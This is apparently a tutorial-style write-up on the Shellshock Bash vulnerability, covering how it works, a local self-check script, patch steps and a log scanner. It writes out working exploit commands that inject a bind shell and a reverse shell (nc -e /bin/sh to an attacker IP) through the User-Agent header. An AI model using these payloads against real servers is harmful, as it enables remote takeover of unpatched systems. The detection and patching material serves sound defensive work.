CVE-2014-6271 (Shellshock)

CVE-2014-6271, commonly known as Shellshock, is a critical vulnerability in the GNU Bourne Again Shell (Bash). It allows attackers to execute arbitrary commands on a target system by exploiting how Bash processes environment variables. This vulnerability affects systems where Bash is used to handle script execution - particularly in CGI (Common Gateway Interface) web server configurations.

How It Works

When a web server (such as Apache) receives an HTTP request, it often passes headers and parameters to CGI scripts. These values are converted into environment variables before launching the script. If the CGI script is written in Bash or calls Bash indirectly, any maliciously crafted environment variable can trigger unintended command execution.

The vulnerability arises because Bash allows function definitions to be exported via environment variables: a variable whose value begins with "() {" is imported as a function when a new Bash process starts. The unpatched parser does not stop at the end of the function body, so any commands appended after the closing brace are executed immediately as part of shell initialization, without the function ever being called.

For example, an attacker can inject a payload in the User-Agent header:

In this case:

  • () { :;}; defines a valid (but empty) Bash function.
  • The code that follows the closing brace and semicolon is additional code that Bash will execute due to the flaw.

This results in the contents of /etc/passwd being printed in the server's response - confirming successful arbitrary command execution.
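The following self-check is an added example and not part of the original write-up. It reproduces the mechanism described above on the local machine: it exports a variable whose value is an empty function definition followed by a trailing command, starts a child Bash, and reports whether the trailing command ran. It assumes a bash binary is on PATH; the function names are my own.

```shell
#!/bin/sh
# Added example, not part of the original write-up: a local Shellshock
# self-check. Bash imports any environment variable whose value begins with
# "() {" as a function definition at startup. An unpatched Bash keeps parsing
# past the closing brace and runs whatever follows it, so the trailing
# "echo vulnerable" below only produces output on an affected build; a patched
# Bash prints just "this is a test". Requires a bash binary on PATH.

# Prints one of: vulnerable, patched, no-bash
shellshock_check() {
    if ! command -v bash >/dev/null 2>&1; then
        echo no-bash
        return 0
    fi
    # x is the exported variable; everything after "};" is the trailing code.
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo this is a test' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}

# Exit-status form for fleet or configuration-management checks:
# 0 = patched, 2 = vulnerable, 3 = no bash found.
shellshock_exit_status() {
    case "$(shellshock_check)" in
        patched)    return 0 ;;
        vulnerable) return 2 ;;
        *)          return 3 ;;
    esac
}

# Usage: sh shellshock_check.sh
echo "local bash: $(shellshock_check)"
```

A result of patched means only that the trailing-code behaviour of CVE-2014-6271 is closed on this build; it is a verification step to run after the vendor package update, not a substitute for it.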

Bind Shell

One way to gain interactive access is by setting up a bind shell, which opens a listening port on the target machine and connects the shell session to it.

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80

This command starts a netcat listener on port 9999, binding a shell to it. You could then connect to vulnerable:9999 and get a remote shell.

Limitation: Firewalls or network policies often block incoming connections to arbitrary ports, making bind shells unreliable in many real-world scenarios.

Reverse Shell

A more effective method is the reverse shell, where the target connects back to the attacker's machine - bypassing most firewall restrictions.

  1. Start a listener on your machine:

     # nc -l -p 443

     Port 443 is used because it's commonly allowed through firewalls for HTTPS traffic.

  2. Send the reverse shell payload:

     echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.159.1 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80

     Replace 192.168.159.1 with your actual IP address.

Once executed, the vulnerable server will initiate a connection back to your machine on port 443, providing full shell access.

Impact and Mitigation

Severity: Critical - CVSS Score: 10.0 (Maximum risk)
Affected Systems: Any system running vulnerable versions of Bash (prior to patch releases in September 2014)

Mitigation Steps:

  • Update Bash to a patched version using your system's package manager:

    # On Debian/Ubuntu
    sudo apt update && sudo apt install --only-upgrade bash

    # On CentOS/RHEL
    sudo yum update bash
  • Disable CGI scripts that invoke Bash unless absolutely necessary.
  • Use WAF (Web Application Firewall) rules to detect and block Shellshock-style payloads.
  • Minimize the use of shell scripts in server-side environments.
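As an added example of the detection side of the WAF bullet above (my code, not part of the original page), the script below scans web server access logs for the "() {" signature that Bash requires at the start of an exported-function value. It assumes the Apache/nginx "combined" log format, where the request line, Referer and User-Agent are the quoted fields, and uses a constructed sample log whose only payload is a harmless echo marker; the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original page: scan combined-format web server
# access logs for Shellshock-style header values. Assumes the Apache/nginx
# "combined" LogFormat, where the request line, Referer and User-Agent are the
# quoted fields; function names are my own.

# Bash only treats a variable as an exported function when its value begins with
# the exact four characters "() {", so that prefix is the signature. The
# patterns below are deliberately a little looser (any whitespace between the
# parentheses and the brace, anywhere in the field) so that sloppy variants a
# WAF rule would also want to flag are not missed.

# Exit status 0 if the header value carries the signature, 1 otherwise.
has_shellshock_signature() {
    printf '%s\n' "$1" | grep -Eq '\(\)[[:space:]]*[{]'
}

# stdin: log lines; stdout: "<client-ip><TAB><offending field>" per hit.
scan_access_log() {
    awk -F'"' '{
        split($1, head, " ")           # head[1] is the client address
        for (i = 2; i <= NF; i += 2) { # even fields are the quoted values
            if ($i ~ /[(][)][ \t]*[{]/) {
                print head[1] "\t" $i
            }
        }
    }'
}

# Constructed sample log (not taken from any real server). The only "payload"
# is a harmless "echo probe" marker; the signature is the "() {" prefix.
SAMPLE_LOG='192.0.2.10 - - [25/Sep/2014:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo probe"
198.51.100.7 - - [25/Sep/2014:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [25/Sep/2014:10:00:03 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :;}; echo probe" "curl/7.37.0"'

# Number of matching lines in the sample.
count_hits() {
    printf '%s\n' "$SAMPLE_LOG" | scan_access_log | wc -l | tr -d ' '
}

# Distinct client addresses that sent a matching request, space-separated.
hit_sources() {
    printf '%s\n' "$SAMPLE_LOG" | scan_access_log | cut -f1 | sort -u | xargs
}

# Usage on a real log: scan_access_log < /var/log/apache2/access.log
printf '%s\n' "$SAMPLE_LOG" | scan_access_log
```

Note that the default "common" log format does not record the User-Agent or Referer at all, so a server that only logs in that format leaves no trace of a header-borne attempt; switching to the combined format is itself part of the mitigation. The third sample line shows why every quoted field is checked rather than only the User-Agent: Referer is also passed to CGI scripts as an environment variable.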

Published on Aug 21, 2025